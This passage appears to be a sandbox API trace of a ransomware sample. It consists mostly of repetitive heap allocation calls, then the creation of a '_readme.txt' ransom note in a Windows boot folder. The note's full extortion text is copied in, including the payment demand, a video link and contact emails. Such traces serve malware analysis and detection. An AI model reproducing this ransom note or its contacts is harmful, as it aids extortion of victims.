Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.833] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.833] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.833] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.833] PathFindFileNameW (pszPath="") returned="" [0200.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.834] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.834] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.834] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.834] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.834] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0200.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.834] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0200.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.835] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we 